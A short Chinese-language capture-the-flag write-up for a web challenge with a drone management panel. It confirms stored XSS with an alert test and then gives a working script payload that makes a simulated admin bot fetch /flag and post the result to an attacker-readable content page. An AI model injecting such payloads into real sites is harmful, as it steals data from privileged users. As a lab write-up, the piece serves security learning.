web02

随便登录一手给个页面

进去是无人机管理界面,经测试很明显是xss

1
<script>alert("111")</script>

更新之后会弹窗

上传数据明显是模拟机器人对数据进行处理,也就会相应的以boss身份触发xss,我们写一个fetch模拟,让提交后boss自动访问flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<script>
fetch('/flag')
  .then(response => response.text())
  .then(data => {
    fetch('/content/f73258069b02711123eb612553563cbf', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
      },
      body: "content=" + encodeURIComponent(data)
    });
  })
  .catch(error => console.error('nononono:', error));
</script>

更新后提交得到flag